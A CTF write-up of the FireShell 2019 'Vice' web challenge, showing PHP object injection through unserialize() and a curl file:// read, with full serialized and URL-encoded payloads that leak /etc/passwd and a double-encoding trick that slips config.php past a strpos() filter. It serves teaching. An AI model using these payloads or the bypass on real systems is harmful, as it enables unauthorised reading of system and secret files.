FireShell CTF 2019 | WEB (Vice) Writeup

Abdelkader Belcaid
Jan 27 · 4 min read

27/01/2019 19:00 PM UTC+2


This is a writeup for the web challenge Vice from FireShell CTF 2019, which ran today. If you don't already know it, FireShell CTF is a Brazilian jeopardy-style event that is friendly to beginners. The aim is to test participants' hacking skills in a challenging yet fun environment.

Vice — 300pts


This web task is named Vice. According to the dynamic scoreboard it was worth 300 points when I solved it.

Challenge: Vice

First, let's read and understand the given PHP script to see what the challenge needs.

The script reads a GET parameter named gg and passes it straight to unserialize(). That is the place to look for bugs, so I read through the code and tested it on my localhost.

The class that gets unserialized defines the magic method __destruct, which PHP calls automatically when the object is destroyed (at the latest when the request ends).

So this is probably PHP Object Injection. For how this class of bug is exploited, with different scenarios and some payloads, see:

As mentioned, the __destruct magic method fires when the object is destroyed, so whatever it does runs without us having to call anything ourselves:

function __destruct(){
    if(in_array($this->method,array("doit"))){
        call_user_func_array(array($this,$this->method),array());
    }else{
        die(":)");
    }
}

So we target the SHITS class, which has five properties. __destruct only calls the method named in $this->method if it is in the allow-list array("doit"), so the important method is doit:

function doit(){
    $this->host = @parse_url($this->url)['host'];
    $this->addr = @gethostbyname($this->host);
    $this->name = @gethostbyaddr($this->host);
    if($this->addr !== "127.0.0.1" || $this->name === false){
        $not = ['.txt','.php','.xml','.html','.','[',']'];
        foreach($not as $ext){
            $p = strpos($this->url,$ext);
            if($p){
                die(":)");
            }
        }
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,$this->url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);

        $result = curl_exec($ch);
        echo $result;
    }else{
        die(":)");
    }
}

The url property goes straight into curl_setopt(CURLOPT_URL) and nothing restricts the scheme, so a file:// URL makes curl read a local file. Here is my payload to leak /etc/passwd (the properties are private, so their serialized names are \0SHITS\0url and so on, with a null byte before and after the class name; that is why their lengths are 10, 13 and 11, and why %00 shows up in the URL-encoded form):

O:5:"SHITS":5:
{
s:10:"\0SHITS\0url";
s:18:"file:///etc/passwd";
s:13:"\0SHITS\0method";
s:4:"doit";
s:11:"\0SHITS\0addr";N;
s:11:"\0SHITS\0host";N;
s:11:"\0SHITS\0name";N;
}

And here is the injected and URL encoded payload:

O%3A5%3A%22SHITS%22%3A5%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A18%3A%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3Bs%3A11%3A%22%00SHITS%00addr%22%3BN%3Bs%3A11%3A%22%00SHITS%00host%22%3BN%3Bs%3A11%3A%22%00SHITS%00name%22%3BN%3B%7D
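To see exactly how that payload is put together (and why the property-name lengths are 10, 13 and 11), here is an added Python helper. It is not part of the original writeup or of the challenge, which is PHP; Python is used here as exploit-side tooling. It assumes the five SHITS properties are declared private, which the \0SHITS\0 name mangling in the encoded payload above implies, and under that assumption it reproduces the encoded query string byte for byte.

```python
"""Build the PHP-serialized SHITS object used in the writeup.

Added example, not from the original post or the challenge. It writes the
serialize() format by hand so the byte lengths and the null bytes around
private property names are visible. Assumption: all five properties of
class SHITS are private (that is what "\0SHITS\0url" in the original
encoded payload implies).
"""
from urllib.parse import quote


def php_str(s: bytes) -> bytes:
    # s:<length>:"<bytes>";  -- the length is counted in bytes, not characters
    return b's:%d:"%s";' % (len(s), s)


def php_private_name(cls: str, prop: str) -> bytes:
    # serialize() mangles a private property as "\0Class\0prop"
    return b"\0" + cls.encode() + b"\0" + prop.encode()


def serialize_object(cls: str, props: dict) -> bytes:
    """Serialize an object whose properties are all private.

    Values are bytes (PHP string) or None (PHP null, written as N;).
    Property order is preserved, so the output matches what the writeup sent.
    """
    body = b""
    for name, value in props.items():
        body += php_str(php_private_name(cls, name))
        body += b"N;" if value is None else php_str(value)
    return b'O:%d:"%s":%d:{%s}' % (len(cls), cls.encode(), len(props), body)


def shits_payload(url: bytes) -> bytes:
    """The SHITS object with method=doit and the given url, as PHP will see it
    after $_GET decoding (so pass config%2ephp, not config%252ephp)."""
    return serialize_object("SHITS", {
        "url": url,
        "method": b"doit",
        "addr": None,
        "host": None,
        "name": None,
    })


def encoded_query(url: bytes) -> str:
    # Percent-encode every reserved byte so the NULs survive as %00 in the
    # query string and a literal % becomes %25; PHP decodes this once into $_GET.
    return "gg=" + quote(shits_payload(url), safe="")


if __name__ == "__main__":
    print(shits_payload(b"file:///etc/passwd"))
    print(encoded_query(b"file:///etc/passwd"))
    # The config.php payload: 33 bytes because PHP will see %2e, not a dot.
    print(encoded_query(b"file:///var/www/html/config%2ephp"))
```

Running it prints the same query string as the URL-encoded payload above; feeding it the config.php URL (with %2e) yields the s:33 string and %252e seen in the second payload further down.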

And /etc/passwd is leaked (the request URL, followed by the response):

http://68.183.31.62:991/?gg=O%3A5%3A%22SHITS%22%3A5%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A18%3A%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3Bs%3A11%3A%22%00SHITS%00addr%22%3BN%3Bs%3A11%3A%22%00SHITS%00host%22%3BN%3Bs%3A11%3A%22%00SHITS%00name%22%3BN%3B%7D

--------------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false

Now we have to keep going. The goal is to read the flag, which according to the given script is stored in config.php (the script require()s it). So let's try to leak config.php the same way we leaked /etc/passwd.

I tried different methods to leak config.php, but with no result!

The main problem is that ".php" is one of the filtered strings, and so is "." on its own, so any file:// URL containing a dot dies with ":)". The /etc/passwd path only got through because it contains no dot. So config.php cannot be fetched directly:


After a couple of hours of research I found a PHP bug report about bypassing strpos() checks that looked exploitable here and might let us get config.php past the filter.

The report is titled "Bypass Strpos Verification" and is one of the more recent PHP bugs, submitted on 2018-07-27. It concerns strings that reach strpos() percent-encoded: when the string is double-encoded, the check can be bypassed, for example with %2570hp when the check is strpos($string, "php").

In our case the check is strpos($this->url, ".php") (and also strpos($this->url, ".")), so we bypass it with double encoding. In fact it is enough to double-encode just the ".". Strictly speaking strpos() is doing its job; the bypass works because the string is decoded on both sides of the check: PHP decodes the query string once before the value reaches unserialize(), so the filter sees %2e and no literal dot, and curl then percent-decodes the path of a file:// URL before opening it, so it sees the dot.

The double encoding of "." is %252e. Another problem was that I did not even know the correct path of config.php; I guessed it with help from my friends, and it turned out to be /var/www/html/config.php.
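The following added Python model is not the challenge's code or the author's; it walks the url property through the three decoding stages involved (PHP's query-string decoding, the strpos() loop from doit(), and curl's decoding of a file:// path) to show why config.php and config%2ephp die while config%252ephp reaches the file. The curl behaviour is modelled as an assumption, and hardened_check() is an added contrast showing a scheme allow-list, which the challenge never had.

```python
"""Model of the decoding stages behind the config%252ephp bypass.

Added example, not code from the challenge or the original writeup. It
assumes: (1) PHP percent-decodes the query string once before the value
reaches unserialize(); (2) the filter is the strpos() loop from doit();
(3) curl percent-decodes the path of a file:// URL before opening it.
hardened_check() is an added contrast, not something the challenge had.
"""
from typing import Optional
from urllib.parse import unquote

# The $not array from doit(); "." alone is enough to kill any dotted path.
BLOCKED = [".txt", ".php", ".xml", ".html", ".", "[", "]"]


def php_query_decode(raw: str) -> str:
    """Stage 1: what $_GET['gg'] contains after PHP's single decode."""
    return unquote(raw.replace("+", " "))


def doit_filter(url: str) -> bool:
    """Stage 2: mirror of the strpos() loop. Returns True if the URL survives.

    strpos() returns false (not found) or the offset; `if($p)` is false for
    both false and 0, so only a match at offset > 0 triggers die(":)").
    """
    for ext in BLOCKED:
        if url.find(ext) > 0:
            return False
    return True


def curl_file_path(url: str) -> Optional[str]:
    """Stage 3: the path curl opens for a file:// URL (percent-decoded)."""
    if not url.startswith("file://"):
        return None
    return unquote(url[len("file://"):])


def resolve(raw_url: str) -> Optional[str]:
    """Walk the url property, as it sits inside the query string, through
    all three stages. None means the filter killed the request. Passing
    the fully encoded form (file%3A%2F%2F...) gives the same result."""
    url = php_query_decode(raw_url)
    if not doit_filter(url):
        return None
    return curl_file_path(url)


def hardened_check(url: str) -> bool:
    """Contrast: decode until stable, then allow-list the scheme instead of
    deny-listing substrings. Any file:// URL fails regardless of encoding."""
    decoded = url
    for _ in range(8):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    scheme = decoded.split(":", 1)[0].lower()
    return scheme in ("http", "https")


if __name__ == "__main__":
    for candidate in (
        "file:///etc/passwd",                   # no dot: passes
        "file:///var/www/html/config.php",      # ".php" found: dies
        "file:///var/www/html/config%2ephp",    # PHP decodes %2e to ".": dies
        "file:///var/www/html/config%252ephp",  # filter sees %2e, curl sees ".": passes
    ):
        print(f"{candidate:40} -> {resolve(candidate)}")
```

The single-encoded form fails for the same reason the plain path does: by the time strpos() runs, $_GET has already turned %2e into a dot. Only the double-encoded form leaves a %2e for the filter and a dot for curl.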

Here is the final payload, which gets past the strpos check and makes curl read config.php so we can get the flag stored in it. Note that the serialized string PHP actually sees contains config%2ephp (33 bytes), because $_GET has already decoded %25 to %; the %252e form appears only in the request URL:

O:5:"SHITS":5:
{
s:10:"\0SHITS\0url";
s:33:"file:///var/www/html/config%2ephp";
s:13:"\0SHITS\0method";
s:4:"doit";
s:11:"\0SHITS\0addr";N;
s:11:"\0SHITS\0host";N;
s:11:"\0SHITS\0name";N;
}

And here is the payload as sent, URL-encoded once more (which turns %2e into %252e):

O%3A5%3A%22SHITS%22%3A5%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A33%3A%22file%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fconfig%252ephp%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3Bs%3A11%3A%22%00SHITS%00addr%22%3BN%3Bs%3A11%3A%22%00SHITS%00host%22%3BN%3Bs%3A11%3A%22%00SHITS%00name%22%3BN%3B%7D 

And here config.php is read. curl returns the raw source rather than the script's output, and the browser does not display the raw <?php block, so the page itself looks empty:

http://68.183.31.62:991/?gg=O%3A5%3A%22SHITS%22%3A5%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A33%3A%22file%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fconfig%252ephp%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3Bs%3A11%3A%22%00SHITS%00addr%22%3BN%3Bs%3A11%3A%22%00SHITS%00host%22%3BN%3Bs%3A11%3A%22%00SHITS%00name%22%3BN%3B%7D

Then read the flag by viewing the page source:


Here is the leaked config.php script. Note that its condition is always true (REMOTE_ADDR cannot equal both '::1' and '127.0.0.1' at once), so $flag is never set when the script runs; reading the source is the only way to get it:

<?php
if($_SERVER['REMOTE_ADDR'] !== '::1' || $_SERVER['REMOTE_ADDR'] !== '127.0.0.1'){
    echo "aaawn";
}else{
    $flag ="F#{wtf_5trp0s_}";
}

FLAG is: F#{wtf_5trp0s_}

It was a good web challenge; I enjoyed it with my friends and teammates. I would like to thank the FireShell team for creating such an interesting task and for organizing this CTF.

Best Regards,

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. #sharingiscaring
